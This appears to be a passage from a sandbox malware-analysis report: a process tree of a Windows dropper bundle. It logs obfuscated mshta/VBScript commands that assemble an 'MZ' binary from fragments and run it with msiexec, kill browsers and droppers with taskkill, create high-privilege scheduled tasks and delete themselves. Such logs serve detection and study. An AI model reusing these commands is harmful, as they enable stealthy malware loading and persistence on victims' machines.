        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:6484
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        Executes dropped EXE
        
        PID:5160
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:7320
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:4748
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:4176
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
        13⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
        13⤵
        
        PID:7820
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec -Y ..\lXQ2g.WC
        13⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        
        PID:2284
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:5132
        
        C:\Users\Admin\AppData\Local\Temp\is-6QHR1.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6QHR1.tmp\setup.tmp" /SL5="$4040C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        9⤵
        
        PID:3700
        
        C:\Users\Admin\AppData\Local\Temp\is-2C7EP.tmp\setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-2C7EP.tmp\setup.tmp" /SL5="$40328,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
        10⤵
        
        PID:7448
        
        C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
        11⤵
        
        PID:7944
        
        C:\97a2c93ee8a4d37725d354032599444d\Setup.exe
        
        C:\97a2c93ee8a4d37725d354032599444d\\Setup.exe /q /norestart /x86 /x64 /web
        12⤵
        
        PID:6988
        
        C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
        11⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\is-UHDME.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-UHDME.tmp\postback.exe" ss1
        11⤵
        
        PID:5852
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:2292
        
        C:\Users\Admin\AppData\Local\Temp\askinstall25.exe
        
        "C:\Users\Admin\AppData\Local\Temp\askinstall25.exe"
        7⤵
        
        PID:6632
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        8⤵
        
        PID:4116
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        9⤵
        Kills process with taskkill
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:7976
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        8⤵
        
        PID:7312
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        9⤵
        
        PID:4488
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x20c,0x210,0x214,0x1e8,0x218,0x7ff88381dec0,0x7ff88381ded0,0x7ff88381dee0
        10⤵
        
        PID:7324
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7f3349e70,0x7ff7f3349e80,0x7ff7f3349e90
        11⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2600 /prefetch:1
        10⤵
        
        PID:8236
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2520 /prefetch:1
        10⤵
        
        PID:8228
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=2144 /prefetch:8
        10⤵
        
        PID:8220
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=2120 /prefetch:8
        10⤵
        
        PID:8212
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1544 /prefetch:2
        10⤵
        
        PID:8204
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=2932 /prefetch:8
        10⤵
        
        PID:9016
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=3680 /prefetch:8
        10⤵
        
        PID:6636
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3672 /prefetch:2
        10⤵
        
        PID:4476
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=3168 /prefetch:8
        10⤵
        
        PID:2036
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=3264 /prefetch:8
        10⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,9467200757887017101,17993525547889825586,131072 --lang=de --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4488_63745877" --mojo-platform-channel-handle=2176 /prefetch:8
        10⤵
        
        PID:4976
        
        C:\Users\Admin\AppData\Local\Temp\chrome1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
        7⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\chrome update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
        7⤵
        
        PID:8084
        
        C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        7⤵
        
        PID:7596
      - C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe"
        6⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        7⤵
        
        PID:4456
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\eIvJnTx2mw2goZHn5PCt3xzm.exe" ) do taskkill -im "%~NxK" -F
        8⤵
        
        PID:4864
        
        C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
        
        8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
        9⤵
        
        PID:364
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
        10⤵
        
        PID:7380
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
        11⤵
        
        PID:5308
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )
        10⤵
        
        PID:4408
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
        11⤵
        
        PID:7232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" EcHO "
        12⤵
        
        PID:7820
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
        12⤵
        
        PID:4068
        
        C:\Windows\SysWOW64\msiexec.exe
        
        msiexec.exe -y .\N3V4H8H.SXY
        12⤵
        
        PID:5012
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -im "eIvJnTx2mw2goZHn5PCt3xzm.exe" -F
        9⤵
        Kills process with taskkill
        
        PID:1364
      - C:\Users\Admin\Pictures\Adobe Films\B_e6AswrXczqlW4fJG4F2LZP.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\B_e6AswrXczqlW4fJG4F2LZP.exe"
        6⤵
        
        PID:6060
      - C:\Users\Admin\Pictures\Adobe Films\I0Iut1bqY41oy475Q4wJ5YTn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\I0Iut1bqY41oy475Q4wJ5YTn.exe"
        6⤵
        
        PID:4196
        
        C:\Users\Admin\Pictures\Adobe Films\I0Iut1bqY41oy475Q4wJ5YTn.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\I0Iut1bqY41oy475Q4wJ5YTn.exe"
        7⤵
        
        PID:1748
      - C:\Users\Admin\Pictures\Adobe Films\He9bPWvlo5IsNDJbprjrgJ2d.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\He9bPWvlo5IsNDJbprjrgJ2d.exe"
        6⤵
        
        PID:552
        
        C:\Users\Admin\Pictures\Adobe Films\He9bPWvlo5IsNDJbprjrgJ2d.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\He9bPWvlo5IsNDJbprjrgJ2d.exe"
        7⤵
        
        PID:4496
      - C:\Users\Admin\Pictures\Adobe Films\hFJo0ZcyKQoOVLfGDQqQGJ5c.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\hFJo0ZcyKQoOVLfGDQqQGJ5c.exe"
        6⤵
        
        PID:6080
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\hFJo0ZcyKQoOVLfGDQqQGJ5c.exe" & exit
        7⤵
        
        PID:7328
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:7952
      - C:\Users\Admin\Pictures\Adobe Films\jJmJR01Pg_9r2SVrVEemJDyK.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\jJmJR01Pg_9r2SVrVEemJDyK.exe"
        6⤵
        
        PID:6292
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        7⤵
        
        PID:6840
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        8⤵
        
        PID:7192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue20d8f1968de62f282.exe
      4⤵
      PID:3420
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue20d8f1968de62f282.exe
        
        Tue20d8f1968de62f282.exe
        5⤵
        Executes dropped EXE
        
        PID:608
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 608 -s 1420
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4668
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Tue202dc71d1d41.exe
      4⤵
      PID:3032
    - - C:\Users\Admin\AppData\Local\Temp\7zS457A0586\Tue202dc71d1d41.exe
        
        Tue202dc71d1d41.exe
        5⤵
        Executes dropped EXE
        
        PID:3200
      - C:\Users\Admin\Pictures\Adobe Films\swZFIQh1MhWq2LYgijsSfwPh.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\swZFIQh1MhWq2LYgijsSfwPh.exe"
        6⤵
        
        PID:6016
      - C:\Users\Admin\Pictures\Adobe Films\X5sE7LGsDEcznxXnAaq8Eww8.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\X5sE7LGsDEcznxXnAaq8Eww8.exe"
        6⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:5588
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
        7⤵
        Creates scheduled task(s)
        
        PID:6168
        
        C:\Users\Admin\Documents\DCYsUuNcMoUPMsVbwaEGFBp9.exe
        
        "C:\Users\Admin\Documents\DCYsUuNcMoUPMsVbwaEGFBp9.exe"
        7⤵
        
        PID:7116
        
        C:\Users\Admin\Pictures\Adobe Films\AkqaZfIRPM1i3Tt9GWA3Ixu7.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\AkqaZfIRPM1i3Tt9GWA3Ixu7.exe"
        8⤵
        
        PID:3348
        
        C:\Users\Admin\Pictures\Adobe Films\YrlYqYpCheUh0GoV2C7ImdQC.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\YrlYqYpCheUh0GoV2C7ImdQC.exe"
        8⤵
        
        PID:6276
        
        C:\Users\Admin\Pictures\Adobe Films\4s26sifLAVOudhBYn3yJrGsz.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\4s26sifLAVOudhBYn3yJrGsz.exe"
        8⤵
        
        PID:5508
        
        C:\Users\Admin\Pictures\Adobe Films\x5fEpnXnR3X8OM7UhBtDPN1t.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\x5fEpnXnR3X8OM7UhBtDPN1t.exe"
        8⤵
        
        PID:4088
        
        C:\Users\Admin\Pictures\Adobe Films\tG04MQFG7ly13zq1q73dTiz3.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\tG04MQFG7ly13zq1q73dTiz3.exe"
        8⤵
        
        PID:2188
        
        C:\Users\Admin\Pictures\Adobe Films\196on06u3m_SjS5m_VrFBcHw.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\196on06u3m_SjS5m_VrFBcHw.exe"
        8⤵
        
        PID:4232
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
        9⤵
        
        PID:4724
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--bo6y9QQgnM"
        10⤵
        
        PID:4300
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x200,0x204,0x208,0x1dc,0x20c,0x7ff88381dec0,0x7ff88381ded0,0x7ff88381dee0
        11⤵
        
        PID:5152
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0x94,0x128,0x7ff7f3349e70,0x7ff7f3349e80,0x7ff7f3349e90
        12⤵
        
        PID:4980
        
        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
        
        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,8080405243030346777,11545503803798623428,131072 --lang=de --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4300_199826900" --mojo-platform-channel-handle=1648 /prefetch:8
        11⤵
        
        PID:9040
        
        C:\Users\Admin\Pictures\Adobe Films\R0b5qFpH0jLHTNz1SiTWFkFv.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\R0b5qFpH0jLHTNz1SiTWFkFv.exe"
        8⤵
        
        PID:7632
        
        C:\Users\Admin\AppData\Local\Temp\is-042GA.tmp\R0b5qFpH0jLHTNz1SiTWFkFv.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-042GA.tmp\R0b5qFpH0jLHTNz1SiTWFkFv.tmp" /SL5="$70390,506127,422400,C:\Users\Admin\Pictures\Adobe Films\R0b5qFpH0jLHTNz1SiTWFkFv.exe"
        9⤵
        
        PID:6632
        
        C:\Users\Admin\AppData\Local\Temp\is-AK3J1.tmp\DYbALA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-AK3J1.tmp\DYbALA.exe" /S /UID=2709
        10⤵
        
        PID:4820
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
        
        dw20.exe -x -s 788
        11⤵
        
        PID:2616
        
        C:\Users\Admin\Pictures\Adobe Films\Cloyle_Mh5BiGOVLKHnxFY2r.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Cloyle_Mh5BiGOVLKHnxFY2r.exe"
        8⤵
        
        PID:7780
        
        C:\Users\Admin\Pictures\Adobe Films\Cloyle_Mh5BiGOVLKHnxFY2r.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Cloyle_Mh5BiGOVLKHnxFY2r.exe" -u
        9⤵
        
        PID:6480
        
        C:\Users\Admin\Pictures\Adobe Films\ZLYf8yS_xaDseRbVhQl_b5ob.exe
        
